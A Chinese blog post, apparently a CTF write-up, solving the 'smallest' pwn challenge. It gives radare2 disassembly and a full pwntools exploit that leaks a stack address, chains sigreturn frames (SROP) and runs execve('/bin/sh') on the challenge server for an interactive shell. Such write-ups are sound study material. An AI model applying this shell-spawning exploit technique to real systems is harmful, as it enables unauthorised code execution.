以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15

Warning: Cannot initialize dynamic strings

[x] Analyze all flags starting with sym. and entry0 (aa)

[x] Analyze len bytes of instructions for references (aar)

[x] Analyze function calls (aac)

[ ] [*] Use -AA or aaaa to perform additional experimental analysis.

[x] Constructing a function name for fcn.* and sym.func.* functions (aan))

0x004000b0

 -- WASTED

[0x004000b0]> afl

0x004000b0    1 17           entry0

[0x004000b0]> pdf entry0

            ;-- section..text:

/ (fcn) entry0 17

|   entry0 ();

|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text

|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024

|           0x004000b8      4889e6         mov rsi, rsp

|           0x004000bb      4889c7         mov rdi, rax

|           0x004000be      0f05           syscall

\           0x004000c0      c3             ret

[0x004000b0]>

源码就这么几行,

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06

smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12

[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'

    Arch:     amd64-64-little

    RELRO:    No RELRO

    Stack:    No canary found

    NX:       NX enabled

    PIE:      No PIE (0x400000)

junmoxiao@cat ~/s/pd_ubuntu>

最后的exp

#coding:utf-8

from pwn import *

import time

file_name = './smallest'

context.binary = file_name

elf = ELF(file_name)

#context.log_level = 'debug'

syscall_addr = 0x4000be

#p = process(file_name)

p = remote('106.75.93.227', 20000)

#p = remote('106.75.61.55',  20000)

#gdb.attach(p, 'aslr on;b * 0x4000b0')

# ---------------------------------------------------------------------------------

log.info('call read; call write; call read')

payload = p64(0x4000b0)

payload += p64(0x4000b3)

payload += p64(0x4000b0)

p.sendline(payload)

time.sleep(3)

p.send('\xb3')

# -------------------------------------------------------------------------------------

# set eax; sigreturn;

leak_data = p.recvn(0x400)

leak_addr = u64(leak_data[0x8:0x8+8])

print "leak_addr: %s" % hex(leak_addr)

stack_addr = leak_addr - 0x1000

print 'stack_start_addr %s' % hex(stack_addr)

binsh_addr = stack_addr + 0x300

print 'binsh_addr: %s' % hex(binsh_addr)

log.info('stack pivot to %s' % hex(stack_addr))

frame = SigreturnFrame()

frame.rax = constants.SYS_read

frame.rdi = 0

frame.rsi = stack_addr

frame.rdx = 0x500

frame.rsp = stack_addr

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

p.sendline(payload)

time.sleep(10)

p.send(payload[8:8+15]) # set eax=sigreturn

time.sleep(5)

log.info('execve')

frame = SigreturnFrame()

frame.rax = constants.SYS_execve

frame.rdi = binsh_addr

frame.rsi = 0

frame.rdx = 0

frame.rsp = 0x400300

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00'

p.sendline(payload)

time.sleep(5)

p.send(payload[8:8+15]) # set eax=sigreturn

p.interactive()

SROP的一个实例的更多相关文章

  1. C#[Win32&WinCE&WM]应用程序只能运行一个实例:MutexHelper

    前言 在开发应用程序时,通常只让程序运行一个实例.所以,就要判断程序是否已经运行. 下面是我自己在项目中使用到,封装好的帮助类.有 普通的 C# 应用程序 和 Windows CE 和 Windows ...

  2. 转 C# 只允许运行一个实例

    来源:http://blog.csdn.net/jin20000/article/details/3136791 互斥进程(程序), 简单点说,就是在系统中只能有该程序的一个实例运行. 现在很多软件都 ...

  3. C# 只启动一个实例完全解决方案

    工作上经常会遇到"程序只能启动一个实例"这样的需求. 我想,这样的需求应该很普遍,所以没打算去动脑筋,去找谷歌问下就得了,用下来发现,不是这里不爽就是那里不行. 先说下我详细的几点 ...

  4. ArcGIS API for JavaScript开发环境搭建及第一个实例demo

    原文:ArcGIS API for JavaScript开发环境搭建及第一个实例demo ESRI公司截止到目前已经发布了最新的ArcGIS Server for JavaScript API v3. ...

  5. Sqlserver Sql Agent Job 只能同时有一个实例运行

    Sqlserver Sql Agent中的Job默认情况下只能有一个实例在运行,也就是说假如你的Sql Agent里面有一个正在运行的Job叫"Test Job",如果你现在再去启 ...

  6. c# 只允许一个实例运行

    1.单件模式,Singleton,应用程序只能允许一个实例在运行.这是最好的解决方法2.查询系统进程里是不是已经运行.private void Form1_Load(object sender, Ev ...

  7. Python使用MySQL数据库的方法以及一个实例

    使用环境:Windows+python3.4+MySQL5.5+Navicat 一.创建连接 1.准备工作,想要使用Python操作MySQL,首先需要安装MySQL-Python的包,在Python ...

  8. Linux编程之《只运行一个实例》

    概述 有些时候,我们要求一个程序在系统中只能启动一个实例.比如,Windows自带的播放软件Windows Medea Player在Windows里就只能启动一个实例.原因很简单,如果同时启动几个实 ...

  9. Qt之运行一个实例进程

    简述 发布程序的时候,我们往往会遇到这种情况: 只需要用户运行一个实例进程 用户可以同时运行多个实例进程 一个实例进程的软件有很多,例如:360.酷狗- 多个实例进程的软件也很多,例如:Visual ...

随机推荐

  1. ELK 学习笔记之 Kibana安装

    Kibana安装: 安装地址: https://www.elastic.co/downloads/kibana 安装: tar -zxvf kibana-5.6.1-linux-x86_64.tar. ...

  2. markdown + 七牛云,让写文更容易

    常常写博文的人, 总有这样的烦恼: * 文章格式问题,各种文本编辑器格式不统一,在一处写好的文章复制到其他编辑器中格式错乱 * 图片问题,在不同的平台的图片需要重复上传,如果多平台发布很繁琐 由于这样 ...

  3. Django学习之文件下载

    在实际的项目中很多时候需要用到下载功能,如导excel.pdf或者文件下载,当然你可以使用web服务自己搭建可以用于下载的资源服务器,如nginx,这里我们主要介绍django中的文件下载. 我们这里 ...

  4. 【linux】jdk安装及环境变量配置

    登录linux后,切换目录到 /usr/local cd /user/local 在/usr/local目录新建文件夹java用于存放jdk文件 mkdir java 在文件夹java中下载jdk文件 ...

  5. Springboot之初入江湖

    Hello,各位小伙伴大家好,我是小栈君. 今天的分享主题是关于Springboot主题分享,其实在写这个系列主题之前有想过一些关于分享技术的顺序问题,因为我在创建"IT干货栈"这 ...

  6. Spring 源码阅读 一

    终于,有一天我也来看Spring的源码了,看了一阵之后感觉心情那叫一个舒畅,对Spring底层的实现也有了进一步的了解, 最直观的感受就是Spring的命名风格很赞,很长,真的长到使人见名知意, 闲言 ...

  7. 深入理解C#多线程 -戈多编程

    引用(http://www.cnblogs.com/luxiaoxun/p/3280146.html) 一.使用线程的好处   1.可以使用线程将代码同其他代码隔离,提高应用程序的可靠性. 2.可以使 ...

  8. 代码审计-MetInfo CMS变量覆盖漏洞

    0x01 代码分析 安装好后是这样的 漏洞文件地址\include\common.inc.php 首先是在这个文件发现存在变量覆盖的漏洞 foreach(array('_COOKIE', '_POST ...

  9. table表格中文字超出显示省略号

    第一步: table {table-layout:fixed:}列宽由表格宽度和列宽度设定,不随文字多少变化 第二步: td { white-space:nowrap;/*文本不会换行,文本会在在同一 ...

  10. opencv::像素重映射

    像素重映射(cv::remap) 简单点说就是把输入图像中各个像素按照一定的规则映射到另外一张图像的对应位置上去,形成一张新的图像. Remap( InputArray src, // 输入图像 Ou ...